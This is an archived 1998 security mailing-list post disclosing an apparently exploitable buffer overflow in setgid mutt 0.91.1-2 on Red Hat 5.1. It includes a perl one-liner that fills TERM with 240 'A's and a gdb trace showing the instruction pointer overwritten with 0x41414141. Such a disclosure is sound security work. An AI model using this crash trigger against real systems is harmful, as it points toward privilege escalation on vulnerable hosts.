mutt buffer overflow?

From: funkySh (jn1at_private)
Date: Thu Oct 22 1998 - 00:24:51 PDT

Next message: Michael R. Eckhoff: "Re: solaris tape dev permission stupidity"

Previous message: der Mouse: "My buggy tar :-("
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Sorry if this is already known..

There have been some posts about the buffer overflow in mutt,
(by sending an specially formated Content-Type) here is another
one (i think exploitable) in  mutt 0.91.1-2 shipped with
RH 5.1 with setgid mail

[orbital@PulpFiction /]$ TERM=`perl -e 'print "A" x 240'`
[orbital@PulpFiction /]$ mutt
Segmentation fault
[orbital@PulpFiction /]$ gdb /usr/bin/mutt
...
(gdb) r
Starting program: /usr/bin/mutt

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Mutt 0.91.1-5 has still the same problem but setgid mail is turned off..





--
funkySh                                        jn1at_private
PGP keyID: 768/D837F9A1
fingerprint  36 78 A6 D7 55 38 12 51  05 93 36 65 A0 6E 6D 22

Next message: Michael R. Eckhoff: "Re: solaris tape dev permission stupidity"
Previous message: der Mouse: "My buggy tar :-("
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:20:46 PDT